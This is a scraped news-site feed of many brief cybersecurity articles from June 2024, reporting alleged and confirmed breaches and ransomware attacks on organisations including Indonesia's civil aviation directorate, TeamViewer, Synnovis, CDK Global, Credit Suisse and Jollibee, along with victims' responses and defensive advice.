Normal view
- Cybersecurity News and Magazine
- Italy Cyberattacks: Three Companies Targeted in 24 Hours by RansomHub, RansomHouse
- Cybersecurity News and Magazine
- Indonesia’s Civil Aviation Data Breached? Hacker Claims Access to Employees, Flight Data
Indonesia’s Civil Aviation Data Breached? Hacker Claims Access to Employees, Flight Data
Decoding Indonesian Civil Aviation Data Breach
The threat actor’s post on hacking site Breachforums, stated that the exfiltration of data occurred on June 27,2024. In his post, the hacker stated, “The Directorate General of Civil Aviation (DGCA) is an element that implements some of the duties and functions of the Indonesian Ministry of Transportation, which is under and responsible to the Minister of Transportation. The Directorate General of Civil Aviation is led by the Director General. The Directorate General of Civil Aviation has the task of formulating and implementing policies and technical standardization in the field of air transportation. The Directorate General of Civil Aviation handles the administration and management of civil aviation within the Unitary State of the Republic of Indonesia.” To substantiate the data breach claim, the threat actor attached the following sample records.- User log for small, unmanned aircraft certificates, remote pilot certificate and unmanned aircraft operation approval.
- Sample chats which probably refer to communication of DGCA employees with pilots on 04/13/2022
- ID card photo data for all employees
- Userrname and password of employees who logged on to a DGCA application
Indonesia Battles Three Major Cyberattack Claims in One Week
Hackers have recently carried out allegedly three major cyberattacks on key Indonesian establishments. Last week, a ransomware attack on Indonesia’s national data center has disrupted official government services including immigration services at airports. The attack has reportedly affected more than 200 government agencies at national and regional levels. The attack was carried out by LockBit 3.0 ransomware, a variant known for encrypting victims’ data and demanding payment for its release. The attackers had offered a decryption key in exchange for an $8 million ransom. The AFP however reported that the Indonesian government though refused to pay the ransom but admitted that the cyberattack would have been rendered useless if there was a backup to the main server. Earlier this week, a hacker “MoonzHaxor” had claimed to have breached Indonesian Military's (TNI) Strategic Intelligence Agency (Bais) and offered to sell this data for $1,000 USD. The same hacker had announced breaching Indonesia's Automatic Finger Identification System (Inafis) owned by the National Police (Polri). The data reportedly includes fingerprint images, email addresses, and SpringBoot application configurations. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Geisinger Healthcare Data Breach: Former Employee Exposes Over One Million Patient Records
Geisinger Healthcare Data Breach: Former Employee Exposes Over One Million Patient Records
Geisinger Data Breach Links to Former Employee
The Geisinger data breach was first identified in November 2023 when the organization detected unauthorized access to its patient database by a former Nuance employee, shortly after their termination. Geisinger promptly notified Nuance, which took immediate steps to sever the employee's access to their systems containing patient records. According to Geisinger's Chief Privacy Officer, Jonathan Friesen, "Our patients' and members' privacy is a top priority, and we take protecting it very seriously." Nuance, in collaboration with law enforcement authorities, launched an investigation resulting in the arrest of the former employee, who now faces federal charges. The investigation revealed that the compromised information included patient names along with various details such as date of birth, addresses, medical record numbers, and contact information. Importantly, sensitive financial information such as credit card numbers or Social Security numbers remained unaffected.Geisinger has Notified the Customers About the Data Leak
Geisinger has taken proactive measures to notify affected patients and has provided a dedicated helpline (855-575-8722) for assistance. Patients are advised to review any communications from their health insurer and report any discrepancies promptly. This incident underscores the critical importance of robust data security measures within healthcare systems, especially when handling sensitive patient information," said Friesen. Geisinger continues to cooperate closely with authorities as the investigation progresses, aiming to mitigate any further risks to patient privacy and security. Geisinger urges recipients of the notification to carefully review the details provided and reach out with any questions or concerns. The organization has shared customer service numbers where affected individuals can contact from Monday through Friday, Eastern Time, excluding major U.S. holidays, and reference engagement number B124651. In light of the breach, Geisinger emphasizes its commitment to transparency and patient care, ensuring affected individuals receive the support and resources necessary to safeguard their personal information and mitigate potential risks associated with the Geisinger data leak.- Cybersecurity News and Magazine
- TeamViewer Attributes Corporate Network Breach to APT29 aka Midnight Blizzard
TeamViewer Attributes Corporate Network Breach to APT29 aka Midnight Blizzard
"Current findings of the investigation point to an attack on Wednesday, June 26, tied to credentials of a standard employee account within our Corporate IT environment. Together with our external incident response support, we currently attribute this activity to the threat actor known as APT29 / Midnight Blizzard. Based on current findings of the investigation, the attack was contained within the Corporate IT environment and there is no evidence that the threat actor gained access to our product environment or customer data." - TeamViewerThe company that provides enterprise solutions for remote access, reassured its customers that it follows best-practices in its overall system architecture and thus, has segmented the Corporate IT, the production environment, and the TeamViewer connectivity platform.
"This means we keep all servers, networks, and accounts strictly separate to help prevent unauthorized access and lateral movement between the different environments. This segregation is one of multiple layers of protection in our ‘defense in-depth’ approach." - TeamViewerDespite ongoing investigations, the company remains focused on safeguarding system integrity and ensuring transparency in its communication regarding the incident.
TeamViewer Data Breach Confirmed
The TeamViewer data breach was highlighted by cybersecurity firm NCC Group, which was alerted about the compromise of TeamViewer's remote access and support platform by an APT group. This group, identified as APT29, aka Midnight Blizzard or Cozy Bear, is known for its cyberespionage capabilities and has previously been linked to cyberattacks targeting various global entities, including Western diplomats and technology firms. “On Wednesday, 26 June 2024, our security team detected an irregularity in TeamViewer’s internal corporate IT environment. We immediately activated our response team and procedures, started investigations together with a team of globally renowned cyber security experts, and implemented necessary remediation measures”, reads the official statement. Coinciding with TeamViewer's disclosure, alerts from the Dutch Digital Trust Center and Health-ISAC highlighted the severity of the situation. The Health-ISAC alert specifically warned of active exploitation of TeamViewer by APT29, advising organizations to monitor remote desktop traffic for any suspicious activity.Mitigation Against the TeamViewer Data Leak
TeamViewer, known for its widespread adoption with thousands of customers globally and installed on billions of devices, continues to update stakeholders through its IT security update page. However, concerns have been raised about transparency practices, as the page currently includes a directive preventing indexing by search engines. “There is no evidence to suggest that the product environment or customer data is affected. Investigations are ongoing and our primary focus remains to ensure the integrity of our systems. Security is of utmost importance for us, it is deeply rooted in our DNA. Therefore, we value transparent communication and will continuously update the status of our investigations as new information becomes available” concludes the statement. For users and organizations relying on remote access solutions like TeamViewer, vigilance and proactive monitoring are recommended to mitigate risks posed by sophisticated cyber adversaries. *Update (Friday, June 28 - 8:10 A.M. ET): The headline and text through the article was updated to reflect TeamViewer's Friday update and attribution of the cyberattack to APT29 or Midnight Blizzard.Data of 93,000 Volunteers of India’s NDMA Allegedly Put Up for Sale
Exploring Data Leak Claims of NDMA Volunteers
The NDMA was created in 2006. Its primary responsibility is to coordinate response to natural or man-made disasters and for capacity-building in disaster resiliency and crisis response. It is also the apex body for setting policies, plans and guidelines for disaster management to ensure a timely and effective response to disasters. The allegation that NDMA data had been hacked emerged on June 25 on the data leak site BreachForums. The threat actor “infamous” claimed to be in possession of a stolen database, consisting of the Personally Identifiable Information (PII) of NDMA volunteers, including their personal details such as name, title, gender, blood group, date of birth, email, mobile number, ID number, marital status, family contact number, education qualifications, skills, cadre, address, postal code, and the current state of residence. [caption id="attachment_79228" align="alignnone" width="1596"] Source: X[/caption] To substantiate the data breach claim, the threat actor attached sample records, with the latest timestamp of June 2024, while disclosing that the database includes records of 93,000 volunteers. The cyberattacker is asking $1,000 for the entire data set on BreachForums. Despite these claims by the threat actor, a closer inspection reveals that NDMA’s website is currently functioning normally, showing no signs of a security breach. The threat actor has also not provided clarity on the time period when the services of volunteers occurred. The Cyber Express has reached out to NDMA to verify the alleged cyberattack. As of now, no official statements or responses have been received, leaving the claims unverified.NDMA Volunteers Must Stay Vigilant
While authorities investigate the data breach claim, NDMA volunteers must be vigilant and take steps to prevent any malicious activities. Cybercriminals usually employ a range of tactics to misuse personal information, perpetuating identity theft and financial fraud. Some prominent techniques include phishing, where hackers trick individuals into revealing their PII by mimicking legitimate entities through fraudulent emails or phone calls. Individuals are also susceptible to identity theft and fraud, where fraudsters use psychological tactics to divulge sensitive information, such as passwords or credit card details. Since the email addresses have also been allegedly leaked, individuals must be vigilant of suspicious messages requesting sensitive information, as well as any unusual activity involving new or existing accounts.Hackers Target 373 Indian Govt Websites in Five Years: Report
According to data published by the Indian Government, hackers have repeatedly targeted key websites run by the administration. An article in The Hindustan Times, quoting data from the Ministry of Electronics and Information Technology, said that, “As per the information reported to and tracked by CERT-In (Indian Computer Emergency Response Team), a total number of 110, 54, 59, 42, 50 and 58 website hacking incidents of Central Ministries/Departments and State Government organizations were observed during the years 2018, 2019, 2020, 2021, 2022 and 2023 (up to September).” The report added that some government offices were still using outdated Windows versions in their official computers and laptops, making them vulnerable to cyber threats. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Evolve Bank Confirms Data Breach, Customer Information Exposed
Details of the Evolve Bank Data Breach
There were reports that the Russian hacker group LockBit was responsible for the ransomware attack and data breach at Evolve Bank. LockBit had claimed to possess Federal Reserve data and, when their demands were not met, released approximately 33 terabytes of data from Evolve's systems. The group had allegedly touted their cache of Federal Reserve data, which was used to pressure the bank into meeting their demands. In response to the reports surfacing about the Evolve data breach, Evolve Bank & Trust is actively informing affected individuals about the breach. The bank has started reaching out to impacted customers and financial technology partners' customers through emails sent from notifications@getevolved.com. The communication includes detailed instructions on how to enroll in complimentary credit monitoring and identity theft detection services.Steps Taken by Evolve Bank & Trust
The bank is undertaking a comprehensive response to this incident, which includes:- Engagement with Law Enforcement: Evolve has involved appropriate law enforcement authorities to aid in the investigation and response efforts.
- Customer Communication: Direct communication with affected customers and financial technology partners' customers is ongoing to ensure they are informed and can take necessary protective measures.
- Credit Monitoring Services: Impacted individuals are being offered complimentary credit monitoring and identity theft detection services.
- Continuous Monitoring: Evolve is closely monitoring the situation and will provide updates as necessary to keep customers informed.
Recommendations for Affected Customers
Evolve Bank & Trust advises all retail banking customers and financial technology partners' customers to remain vigilant by:- Monitoring Account Activity: Regularly check bank accounts and report any suspicious activity immediately.
- Credit Report Checks: Set up free fraud alerts with nationwide credit bureaus—Equifax, Experian, and TransUnion. Customers can also request and review their free credit report through Freecreditreport.com.
- Reporting Suspicious Activity: Contact the bank immediately if any fraudulent or suspicious activity is detected. Additionally, individuals can file a report with the Federal Trade Commission (FTC) or law enforcement authorities if they suspect identity theft or fraud.
- Cybersecurity News and Magazine
- Credit Suisse Data Breach Allegedly Exposes Info of 19,000 Indian Employees
Credit Suisse Data Breach Allegedly Exposes Info of 19,000 Indian Employees
Credit Suisse Data Breach Details
Credit Suisse was founded in 1856 and has approximately $15.21 Billion in revenue. It is one of the leading institutions in private banking and asset management, with strong expertise in investment banking. On June 25, 2024, the threat actor claimed to have carried out a cyberattack on the bank and exfiltrated details on 19,000 of its users. [caption id="attachment_79024" align="alignnone" width="1622"] Source: X[/caption] The breached data purportedly includes names of employees, 6,623 unique email addresses, their codes, date of birth, gender, policy name, relationships, dates of joining, effective dates, statuses, and entities. To substantiate the claim, the threat actor 888 provided a sample of the data breach, which contains details of Credit Suisse employees in India. [caption id="attachment_79025" align="alignnone" width="1362"] Source: X[/caption] The TA, however, did not provide a specific price for the sale of data and has requested potential buyers to quote a figure. The hacker commented that they are only accepting cryptocurrency as the mode of payment. More specifically, the hacker was open to payment on Monero (XMR), a digital currency renowned for its privacy and anonymity attributes. This method of payment is often utilized in illegal transactions to evade detection. Despite these claims by the threat actor, a closer inspection reveals that the bank’s website is currently functioning normally, showing no signs of a security breach. The Cyber Express has reached out to the bank to verify the alleged cyberattack. As of now, no official statements or responses have been received, leaving the claims unverified.Not the First Credit Suisse Data Breach
This is not the first time that Credit Suisse has been involved in a security breach. According to a report published in The Economic Times, in 2023, the bank warned its staff that a former employee stole personal data of its employees, including salaries and bonuses. The information included salary and "variable compensation" for a period between 2013 and 2015. Another Bloomberg report said that a data breach in 2023 impacted numerous former Credit Suisse clients who collectively held a staggering $100 billion in accounts.Credit Suisse Hacker Targeted Big Multinationals Recently
There are many concerns over the potential misuse of sensitive information found in the data breach, which includes customer names, dates of birth, and relationships. Credit Suisse should investigate the data breach claims considering the history of the threat actor. Earlier this month, the TA 888 claimed to have stolen data of over 32,000 current and former employees of Accenture. The company, however, denied the claims and said that the data set published by the hacker had only three employee names and email addresses. The hacker also claimed responsibility for leaking details about 8,174 employees of Heineken across several countries. Prior to this, 888 also staked claims for an attack on oil and gas multinational Shell. The TA posted sample information sharing personal details of Australian customers. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- BianLian Ransomware Targets Better Business Bureau, US Dermatology Partners
BianLian Ransomware Targets Better Business Bureau, US Dermatology Partners
BianLian Ransomware Attack: Critical Details
The first organization targeted by hackers was Better Business Bureau (BBB), which is a private, nonprofit organization founded in 1912 in Arlington, Virginia. The firm maintains a massive database of accredited and non-accredited businesses, providing ratings based on several factors. The Better Business Bureau has a revenue of $430.6 Million. [caption id="attachment_79001" align="alignnone" width="1259"] Source: X[/caption] The threat actor claims to have accessed 1.2 TB of organization data, including accounting, budget, and financial data; contract data and NDAs; files from the CFO's computer; operational and business files; and email and PST archives. The group has also disclosed sensitive information such as the names, personal email addresses, and phone numbers of BBB’s CEO, vice president, chief accreditation officer, and chief activation officer. The other organization that has allegedly fallen victim to the ransomware group is US Dermatology Partners. The organization, with a revenue of $213.7 Million, is one of the premier dermatology practitioners in the USA, caring for over two million patients annually. [caption id="attachment_79002" align="alignnone" width="1259"] Source: X[/caption] The hackers claimed to have accessed 300 GB of organization data, including personal data, accounting and budget information, financial data, contract data and NDAs, and employee profiles.Potential Impact of BianLian Ransomware Attack
If proven, the potential consequences of this ransomware attack could be critical as the accounting and financial details of both these firms could be leaked. The organizations should take appropriate measures to protect the privacy and security of the stakeholders involved. Financial data breaches can lead to identity theft, financial fraud, and a loss of trust among clients, potentially jeopardizing the company’s standing in the industry. Currently, details regarding the extent of the BianLian ransomware attack, data compromise, and the motive behind the cyber assault remain undisclosed. Despite the claims made by BianLian, the official websites of the targeted companies remain fully functional. This discrepancy has raised doubts about the authenticity of the BianLian group’s assertion. To ascertain the veracity of the claims, The Cyber Express has reached out to the officials of the affected organizations. As of the writing of this news report, no response has been received, leaving the ransomware attack claim unverified.History of BianLian Ransomware Group Attacks
BianLian, a ransomware group, has been targeting critical infrastructure sectors in the U.S. and Australia since June 2022. They exploit RDP credentials, use open-source tools for discovery, and extort data via FTP or Rclone. FBI, CISA, and ACSC advise implementing mitigation strategies to prevent ransomware attacks. Initially employing a double-extortion model, they shifted to exfiltration-based extortion by 2023. According to a report by BlackBerry, BianLian ransomware showcases exceptional encryption speed and is coded in the Go programming language (Golang). This sophisticated approach has enabled the group to strike multiple organizations, leaving a trail of unverified claims in its wake. Earlier in 2024, the group targeted companies such as North Star Tax and Accounting, KC Pharmaceuticals, Martinaire. In its attack on MOOver, the group claimed to have accessed a staggering 1.1 terabytes of the firm’s data. Subsequently, Northeast Spine and Sports Medicine also found themselves on the list of victims. All these claims, similar to the recent attack, remain unverified. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- BSNL Data Breached Yet Again? Millions of Users Face Risk of SIM Card Cloning, Financial Fraud
BSNL Data Breached Yet Again? Millions of Users Face Risk of SIM Card Cloning, Financial Fraud
Exploring Claims of BSNL Data Breach
The BSNL data leak was first disclosed by an Indian firm, Athenian Tech, in its threat intelligence report. According to the report, a threat actor, operating under the alias “kiberphant0m”, leaked a significant amount of sensitive data affecting millions of users. The threat actor posted this information on the data hack site BreachForums and shared samples of the breach to legitimize the claim. Overall, around 278GB of sensitive information could be compromised. The hacker also posted details of call log samples which leaked sensitive information like mobile numbers of users, the date and duration of calls, and the amount charged for the call in Indian Rupees. The call log samples were being leaked in two sets: one for the month of May 2024 and another from 2020. This indicates that the data breach was a recent attack raising questions over the security checks in place at BSNL. The threat actor was selling the alleged stolen data for $5,000. The steep price tag could indicate the significant value of the stolen data which is sensitive. The Cyber Express has yet to verify the authenticity of the recent BSNL data breach and has contacted the organization for an official response. This article will be updated based on their response.Potential Implications of BSNL Data Breach
- SIM Cloning and Identity Theft: Cloning a SIM involves creating a duplicate card that has the same IMSI and authentication keys, thus making it easy for the attackers to intercept messages/ calls, gain access to people’s bank accounts, and embezzle their finances.
- Privacy Violations: Identity theft means that one can gain unauthorized access to the individuals’ communication and breaches.
- Financial and Identity Theft: Illegal operations can defeat protective procedures in the financial portfolios, which entail substantial monetary losses and cases of identity theft.
- Targeted Attacks and Scams: The user could be exposed to major security risks and could be vulnerable to phishing schemes and other social engineering attacks, exploiting their trust in BSNL.
Second BSNL Data Breach in Less Than Six Months
If the data theft claims are proven, it would be the second instance of a cyberattack on BSNL in less than six months. In December 2023, a threat actor known as “Perell” claimed access to critical information about fiber and landline users of BSNL. The dataset contained about 32,000 lines of data allegedly impacting over 2.9 million users. However, BSNL did not validate the claims back then. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Neiman Marcus Alerts Customers After Data Breach Exposes Information of 64,472 Individuals
Neiman Marcus Alerts Customers After Data Breach Exposes Information of 64,472 Individuals
Neiman Marcus Data Breach Confirmed
The Neiman Marcus data breach compromised a range of personal data, including customer names, contact details, dates of birth, and Neiman Marcus gift card numbers. "Based on our investigation, the unauthorized party obtained certain personal information stored in the platform," the spokesperson continued, clarifying that "The types of personal information affected varied by individual, and included information such as name, contact information, date of birth, and Neiman Marcus or Bergdorf Goodman gift card numbers (but without gift card PINs)." Neiman Marcus has acted swiftly, launching an investigation with leading cybersecurity experts and notifying law enforcement authorities. In compliance with regulatory requirements, the company has begun notifying affected customers, including reaching out to the Maine Attorney General's office. The retailer has advised customers to monitor their financial statements for any suspicious activity and has provided resources for individuals concerned about identity theft.Mitigation Against the Neiman Marcus Data Leak
"We also began an investigation with assistance from leading cybersecurity experts and notified law enforcement authorities," the spokesperson emphasized. Customers are encouraged to request free credit reports, report any suspected fraud to law enforcement and the Federal Trade Commission, and consider placing a security freeze on their credit files as precautionary measures. Neiman Marcus Group, Inc., based in Dallas, Texas, is a popular luxury retailer that oversees brands such as Neiman Marcus, Bergdorf Goodman, Horchow, and Last Call. Since September 2021, it has been under the ownership of a consortium of investment firms led by Davidson Kempner Capital Management, Sixth Street Partners, and Pacific Investment Management. Following this Neiman Marcus data leak, the firm has established a dedicated toll-free hotline (1-885-889-2743) for affected customers seeking further information or assistance related to the data breach incident.CISA: Hackers Breached Chemical Facilities’ Data in January
Potential Data Compromised in Chemical Facilities' Targeting
CISA's investigation found no direct evidence of data exfiltration but indicated that the hackers might have accessed critical information such as site security plans, security vulnerability assessments (SVAs), and user accounts within CSAT. Additionally, "Top-Screen surveys," which detail the types and quantities of chemicals, their properties, and storage methods at facilities, might have been exposed. High-risk chemical facilities are mandated to submit SVAs outlining their critical assets, cyber and physical security policies, and an analysis of potential vulnerabilities. Other compromised documents could include details on cybersecurity measures, alarms and physical barriers in place at these facilities.CISA's Response and Recommendations
CISA has informed participants in the Chemical Facility Anti-Terrorism Standards (CFATS) program about the potential data exposure. Although no credentials were confirmed to be stolen, CISA advises those with CSAT accounts reset any identical business or personal passwords. They also recommend organizations using Ivanti products review a February advisory about recent vulnerabilities. The agency cannot directly notify individuals submitted for terrorist vetting under the CFATS Personnel Surety Program because it did not collect their contact information. However, identity protection services will be offered to those affected, specifically those vetted between December 2015 and July 2023.Investigation Findings
The breach was detected on January 26, when CISA discovered hackers installing tools on an Ivanti device. Further investigation revealed multiple accesses to the system over two days. Various departments within CISA and the Department of Homeland Security (DHS) were involved in the investigation, which confirmed no hacker access beyond the initial Ivanti device. Despite the absence of evidence for data exfiltration, the potential risk to numerous individuals and organizations categorized this intrusion as a "major incident" under the Federal Information Security Modernization Act (FISMA). CISA is setting up a call center to assist impacted individuals, although it is not yet operational. The agency did not comment on the perpetrators of the attack, but since 2020, CISA has cautioned organizations about state-sponsored hackers, including those linked to China, exploiting vulnerabilities in Ivanti products.Experts Say More Transparency Required
Roger Grimes, a data-driven defense evangelist at KnowBe4, lauded CISA's intent and the fact that it publicly accepted the hack but said a bit more transparency would have done no harm.
"I'm a big fan of CISA. I think they do wonderful work. Still, it would be useful to have better, full transparency," Grimes told The Cyber Express. "Was their Ivanti device exploited by an unpatched, but known vulnerability, or exploited by a 0-day? If they were exploited by a known vulnerability where a patch was available, which is more likely, why wasn't the patch installed? Was it simply due to the fact that the exploit happened faster than the patch could be applied? Was the patch missed? If the patch was missed, why? Or was it a 0-day, misconfiguration, or credential compromise?"
"This is not to embarrass CISA, but to learn why one of the best, most aggressive patch-pushing, cyber-defending organizations in the world got compromised," Grimes added. "Sharing what happened and why can help other organizations facing similar problems and challenges learn lessons.
"CISA is always pushing for other industries and vendors to be more transparent about their compromises so that we can all learn from the lessons and mistakes. I expect CISA to do the same and even lead by example when it's their infrastructure involved."
- Cybersecurity News and Magazine
- Synnovis Confirms Data Published by Qilin Ransomware Gang as Legitimate
Synnovis Confirms Data Published by Qilin Ransomware Gang as Legitimate
“Last week a group claiming responsibility for the cyberattack published data online. We have now been able to confirm that this data was stolen from Synnovis’ systems.” - SynnovisAn initial review from Synnovis over the weekend revealed no evidence that the Laboratory Information Management Systems (LIMS) - the primary databases for patient test requests and results - were posted. However, fragments of patient-identifiable data from an administrative working drive have been published, Synnovis said. The payroll information storage area remains unaffected but further review of employee-related data that appeared in the dataset published on the dark web is underway. Synnovis emphasized the priority of understanding the compromised administrative working drive. The company is working alongside technical experts to ascertain more details and mitigate concerns among service users, employees and partners. The Information Commissioner’s Office (ICO) is investigating the breach, acknowledging the sensitivity of the leaked data and the anxiety it may cause. “While we are continuing to make enquiries into this matter, we recognize the sensitivity of some of the information in question and the worry this may have caused,” the ICO said. The ICO advises concerned individuals to visit its website and NHS England’s site for guidance and support. NHS England continues collaborating with Synnovis and the National Crime Agency to address the ransomware attack. NHS England acknowledged Synnovis’ initial analysis that confirmed the published data originated from their systems. The complex nature of such investigations means it could take weeks to identify all impacted individuals, it said. As the investigation proceeds, NHS England and Synnovis will provide updates and have established a helpline for those affected. Local health systems are working together to manage the impact on patients and have deployed additional resources to ensure urgent blood samples are processed. Laboratories can now also access historical patient records, which aids continuity of care, NHS England said. The cyberattack has significantly delayed blood tests, with some media reports stating NHS patients potentially waiting up to six months for sample collection. Earlier, Synnovis said the ransomware attack had significantly brought down the daily blood sampling count in major London hospitals from 10,000 to merely 400 per day. The Guardian cited a letter to one of the patients from the impacted hospital being told:
“Sadly it appears it may be three to six months before bloods can be taken again. You will be put on a waiting list and our secretaries will contact you when bloods can be taken again. If you haven’t heard anything in the next four months please feel free to contact us on the details above. I want to apologise for this inconvenience and appreciate this will be frustrating.”The pathology service provider was processing only “clinically critical” blood samples flagged by clinicians. These delays have prompted some patients to seek private clinics for faster testing and analysis that cost significantly high. The impact of the Synnovis ransomware attack is also felt on NHS Blood and Transplant (NHSBT), as it appealed to the public earlier this month to urgently donate O blood-type (+ve and -ve) across England. The attack caused significant disruption on the hospitals’ ability to match patients’ blood types, leading to an increased demand for O-positive and O-negative blood donations that are medically considered safe for all patients.
- Cybersecurity News and Magazine
- CDK Global Cyberattack Ripple Effect: Several Car Dealers Report Disruptions
CDK Global Cyberattack Ripple Effect: Several Car Dealers Report Disruptions
Systems Shut Down After Attack
CDK Global, a crucial provider of SaaS platforms for dealerships, was forced last week to shut down its systems in response to the cyberattack. With the work done so far, our core DMS and Digital Retailing solutions have been restored," a spokesperson for CDK Global told The Cyber Express at the time. "We are currently investigating a cyber incident. Erring on the side of caution, we proactively shut all systems down and executed extensive testing." This shutdown has hindered dealerships' abilities to manage customer relationships, sales, financing, service, inventory, and back-office operations. CDK Global's systems are vital to over 15,000 car dealerships in North America. It facilitates various operations, including car sales, repairs and registrations. There are only a handful of DMS companies for dealers to choose from. Thus, thousands of dealerships are hugely reliant on CDK’s services to line up financing and insurance, manage inventory of vehicles and parts, and complete sales and repairs.How CDK Global Cyberattack Impacts Customers
Asbury, AutoNation, Lithia Motors, Sonic Automotive, and Group 1 Automotive have activated their incident response plans and disconnected from CDK systems as a precaution, although no evidence of compromise within their own networks was found. Sonic Automotive mentioned that as of Friday, the extent to which the attackers accessed customer data remains unknown. Lithia Motors highlighted the ongoing negative impact on its operations, indicating uncertainty over whether the incident will materially affect its financial condition. Group 1 Automotive noted that CDK aims to restore the dealer management system within "several days and not weeks," but the financial impact depends on the system's downtime duration. Group 1 owns and operates 202 automotive dealerships, 264 franchises, and 42 collision centers in the United States and the United Kingdom that offer 35 brands of automobiles.CDK Customers Move to Manual Methods
Penske Automotive reported that the ransomware attack primarily affected its Premier Truck Group, which sells heavy- and medium-duty trucks across 48 locations in the U.S. and Canada. The company has implemented business continuity plans and continues operations using manual and alternate processes designed for such incidents. Penske noted that the truck dealership business that serves business customers has lower unit volumes compared to automotive dealerships. Asbury said business operations are functioning but "slower than normal." It added that the dealerships at Koons Automotive locations in Maryland and Virginia do not use CDK’s Dealer Management System or CDK’s Customer Relationship Management system and therefore continue to operate with minimal interruption, as does Clicklane, their online vehicle purchasing platform. Asbury operates 157 new vehicle dealerships, which includes 206 franchises representing 31 domestic and foreign vehicle brands.CDK May Pay Ransom
Late on Friday, Bloomberg reported that CDK Global is negotiating with the a ransomware gang, which Bleeping later confirmed to be BlackSuit, a rebrand of the Royal ransomware group known for last year's attack on the city government of Dallas. Although the ransom amount remains undisclosed, CDK Global reportedly plans to pay, Bloomberg said. CDK Global has issued prerecorded messages to warn customers about hackers posing as CDK staff to gain unauthorized access. Despite making recovery progress last week, CDK faced a second cyber incident that led to a complete shutdown of its systems. The company is working with third-party experts to assess the impact and update its customers regularly. This attack exposes the critical vulnerabilities in the supply chain of the automotive industry and its reliance on centralized digital platforms.Crypto Investors Alarmed as Coinstats Breach Impacts 1,590 Wallets
Understanding the Coinstats Data Breach
[caption id="attachment_78679" align="alignnone" width="733"] Source: Coinstats on X[/caption] In a public statement addressing the breach, Coinstats reassured its user base that the incident has been mitigated, and immediate steps have been taken to secure the platform. Users whose wallet addresses were compromised were advised to take action by transferring their funds using exported private keys. A spreadsheet link was provided for users to check if their wallets were among those affected. CEO Narek Gevorgyan highlighted the seriousness of the situation, acknowledging the challenges posed by the Coinstats cyberattack while emphasizing Coinstats' commitment to restoring normal operations swiftly and securely. Gevorgyan outlined that comprehensive security measures were being implemented during the restoration process to fortify the platform against future vulnerabilities. "We're actively working to bring the app back online as quickly as possible. Thank you for your patience," stated Gevorgyan in an update shared via Coinstats' official channels.North Korea-linked Hackers Behind the Data Breach at Coinstats
The revelation of North Korea-linked hackers being behind the breach adds a geopolitical dimension to the Coinstats data breach incident, highlighting the global reach and sophisticated tactics employed by cyber threat actors targeting digital assets and platforms. This aspect of the breach highlights the need for heightened cybersecurity measures across the cryptocurrency sector. In a similar case, another crypto firm, BtcTurk faced a cyberattack on its hot wallets on June 22, 2024. Binance Binance CEO Richard Teng confirmed this attack, pledging ongoing support for BtcTurk's investigation. Cryptocurrency investigator ZachXBT hinted at a possible link between the breach and a $54 million Avalanche transfer. Coinstats users have been urged to remain vigilant and monitor their accounts closely for any unauthorized transactions or suspicious activities. The company assured its users that it is actively investigating the extent of funds moved during the breach and pledged to provide updates as new information becomes available. In response to the breach, regulatory bodies and industry stakeholders may scrutinize Coinstats' security practices and response protocols. The outcome of such scrutiny could influence future cybersecurity standards within the cryptocurrency industry, potentially leading to more stringent requirements for platform security and user protection.- Cybersecurity News and Magazine
- Jollibee Probes Alleged Data Breach Affecting 32 Million Customers, Asks Public to Remain Vigilant
Jollibee Probes Alleged Data Breach Affecting 32 Million Customers, Asks Public to Remain Vigilant
Details of Jollibee Probe into Cyberattack
The Philippines National Privacy Commission (NPC) regulations make it mandatory for organizations in the country to report and inform stakeholders of cybersecurity incidents within 72 hours of discovery. A statement was released on June 22 by Richard Shin, Chief Financial Officer and Corporate Information Officer of JFC, which said that it was addressing “a cybersecurity incident” that reportedly affected the company, “in addition to other subsidiaries”. “The Company is addressing the incident and has implemented its response protocols and deployed enhanced security measures to further protect the Company’s and its subsidiaries’ data against threats. The Company has also launched its investigation on the matter to understand the scope of this incident, and is currently working with the relevant authorities and experts in its investigation,” the statement said. JFC, however, added that its e-commerce platforms and those of its subsidiaries’ brands remained unaffected by the cyberattack and continued to be operational. It added that the safety of data from stakeholders was paramount for the company. “JFC recognizes the value and importance of the confidentiality of personal information of its stakeholders. The Company assures the public of its commitment to prioritize the protection and confidentiality of such personal information, including customer data, by continuously fortifying its defenses against future threats,” the company said. “The Company further assures the public that it continues to monitor and update its security measurements as appropriate under the circumstances, and as may be required by the results of its investigation into this matter,” it added. The fast-food delivery group urged the public to be vigilant and exercise good information security practices, including keeping passwords secure and changing them often.Jollibee’s Cybersecurity Concerns
The alleged data breach of the fast-food chain took place on popular data hack site BreachForums on June 20. The threat actor, “Sp1d3r”, claimed to have carried out a cyberattack and had gained access to the data of 32 million Jollibee customers, including their names, addresses, phone numbers, email addresses and hashed passwords. The hacker also allegedly exfiltrated 600 million rows of data related to food delivery, sales orders, transactions and service details. JFC, meanwhile, is investigating this alleged cyberattack on its brands and subsidiaries, including Greenwich, Red Ribbon, Burger King Philippines, and Highlands Coffee. This is not the first time that Jollibee has faced flak for its cybersecurity measures. In December 2017, JFC had informed of a data breach of its delivery website. The NPC had then warned that the data of 18 million customers was at “a very high risk” of being exposed. After an investigation, the NPC in May 2018 suspended Jollibee’s delivery website due to “serious vulnerabilities.” JFC also took down the delivery websites of its other brands. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Binance Steps in to Aid Investigation of BtcTurk Cyberattack, Freezes $5.3M in Stolen Funds
Binance Steps in to Aid Investigation of BtcTurk Cyberattack, Freezes $5.3M in Stolen Funds
Decoding the BtcTurk Cyberattack
